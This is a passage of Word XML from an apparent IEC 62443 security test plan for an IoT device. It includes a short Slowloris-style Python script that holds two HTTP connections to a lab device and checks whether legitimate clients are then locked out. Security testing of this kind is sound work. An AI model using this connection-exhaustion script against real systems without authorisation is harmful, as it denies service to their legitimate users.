        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="6749EDB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A2DC164" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B6D8E15" w14:textId="77777777" w:rsidR="00757C3E" w:rsidRDefault="00757C3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1</w:t>
            </w:r>
            <w:r w:rsidRPr="00757C3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. In OPERATE, open two HTTP connections to the IoT-Core and hold them (no completion / slow read). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A11B55F" w14:textId="77777777" w:rsidR="00757C3E" w:rsidRDefault="00757C3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57C3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. From a third client, attempt a legitimate identification read. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157620E8" w14:textId="6FD92FF5" w:rsidR="00757C3E" w:rsidRDefault="00757C3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57C3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Measure whether the third request is refused/timed out. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6860DEA2" w14:textId="04F06598" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00757C3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57C3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Release one held connection; confirm access is restored</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="440A9E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31E299" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F290C9E" w14:textId="77777777" w:rsidR="00CC097E" w:rsidRDefault="00CC097E"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CC097E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement iff a legitimate third read still succeeds (service resilient to two held connections). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06CEBBE3" w14:textId="6B5D2388" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00CC097E"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CC097E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected = FAIL: the third request is blocked while two connections are held → confirms G-2 (self-inflicted DoS availability failure).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66770B72" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="00AF57B2" w:rsidRDefault="0069129D" w:rsidP="0069129D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFF0D1F" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="0069129D">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9129D" w14:paraId="3AB47E3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A75000" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BB50604" w14:textId="77777777" w:rsidR="0069129D"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9129D" w14:paraId="07055B2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5B4871" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Ref. Test </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF6FAED" w14:textId="382D6E32" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00686B9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86B91">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>TC-RQ007-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00F15AEA" w14:paraId="388B70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387713C" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E100B3A" w14:textId="518EC45D" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="0050348C"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0348C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT 192.168.0.2; Pi eth1 = 192.168.50.10 (attacker + legitimate client)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="2A55703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8652D49" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C8736FE" w14:textId="55716DF0" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00EF34A7"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F34A7">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Python (raw sockets, hold connections), curl (third-client probe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="6BFE9B7B"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BE9B77" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7005FE17"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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F1999D"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 TC-RQ007-03 Hold 2 HTTP connections; then probe with a 3rd legitimate read</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9EED2F"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import socket, subprocess, time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EFDF30C"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DUT, PORT = "192.168.0.2", 80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F61FE6E"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6D6AB174"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def hold(): # open + partial request, never finish (Slowloris-style)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="312693C5"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s = socket.create_connection((DUT, PORT), timeout=5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FFFC44F"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s.sendall(b"GET /deviceinfo/swrevision HTTP/1.1\r\nHost: dut\r\n") # header withheld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021AD914"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return s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B068797"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248C95F5"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held = [hold(), hold()] # occupy both permitted connections (SRIO-7909)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4061AA47"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time.sleep(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCE2A33"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print("[*] 2 connections held; probing with a 3rd legitimate request...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6935E082" w14:textId="77777777" w:rsidR="00DD27F5" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>r = subprocess.run(["curl","-s","-m","3","-o","/dev/null","-w","%{http_code}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F2D057"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f"http://{DUT}/deviceinfo/swinfo/scpuversion"], capture_output=True, text=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="482F6FC6"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print("[+] 3rd-client HTTP code:", r.stdout or "TIMEOUT") # expect: timeout/refused -&gt; G-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5EE185" w14:textId="5EDFD46C" w:rsidR="0069129D" w:rsidRPr="00105368"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for s in held: s.close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="2F43BB9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19FBABE" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07CBC4A6" w14:textId="39EEAADC" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00D371E9" w:rsidP="00D371E9">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D371E9">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Third-client read times out / is refused while both connections are held; access returns after release (SRIO-7909).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="26D55175"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47F8A68" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BEDA4BA" w14:textId="79F753A4" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00D371E9"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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00D371E9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> read blocked/ Access restored on release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="2875B19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0A2BFD5" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EA62F69" w14:textId="68A15D17" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="004A3C9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4A3C99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Script console log, curl timing, optional mirror PCAP of the three sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="462B2E59" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="0069129D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236A7A81" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C3A734" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FB20D9" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0E0AD7" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB76E7E" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C83F56F" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C05B346" w14:textId="77777777" w:rsidR="00261D60" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C3B547" w14:textId="77777777" w:rsidR="00261D60" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08859E87" w14:textId="77777777" w:rsidR="00261D60" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765B973E" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762C47B1" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472743DA" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125B458F" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBE28DD" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C72BCE8" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8A8CB5" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E904C4" w14:textId="77777777" w:rsidR="00261D60" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C8C0D8" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4F8AD5" w14:textId="15E95AB0" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E0CD6"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646A5D65" w14:textId="2C52568F" w:rsidR="006D65EB" w:rsidRPr="006D65EB" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DE419" w14:textId="2E79D1EB" w:rsidR="006D65EB" w:rsidRPr="006D65EB" w:rsidRDefault="006D65EB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D65EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall collect evidence of any legitimate or illegitimate intervention in the software installed on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61748F50" w14:textId="205BCDC4" w:rsidR="006D65EB" w:rsidRPr="006D65EB" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8,</w:t>
      </w:r>
      <w:r w:rsidR="00312070">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.9, CR 2.10</w:t>
      </w:r>
      <w:r w:rsidR="00092B56">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.11, </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.12</w:t>
      </w:r>
      <w:r w:rsidR="00312070">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, EDR 2.13, CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAAD00C" w14:textId="12D3549A" w:rsidR="006D65EB" w:rsidRPr="006D65EB" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D (subject of intervention); G (software-invention trigger); I (evidence)</w:t>
      </w:r>
      <w:r w:rsidR="00622F32">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC29FC" w14:textId="42D6BD3A" w:rsidR="006D65EB" w:rsidRPr="006D65EB" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001823B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00622F32">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering, )</w:t>
      </w:r>
      <w:r w:rsidR="00D86735">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAD8A6" w14:textId="77777777" w:rsidR="007E0FF7" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
      <w:r w:rsidR="006D65EB" w:rsidRPr="006D65EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB80B5F" w14:textId="0CB78CA8" w:rsidR="00A779E7" w:rsidRPr="00A779E7" w:rsidRDefault="00A779E7" w:rsidP="00A779E7">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>COM Error Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A779E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
